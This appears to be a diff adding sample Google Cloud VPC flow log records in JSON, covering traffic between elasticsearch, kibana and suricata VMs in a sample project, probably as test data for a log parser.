+{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.14","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"67.43.156.13","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"67.43.156.13","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"67.43.156.13","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proje
ct","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"67.43.156.13","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"67.43.156.13","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_i
d":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985404352
8829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"67.43.156.13","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","s
ubnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"}
,"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.168.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"67.43.156.13","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
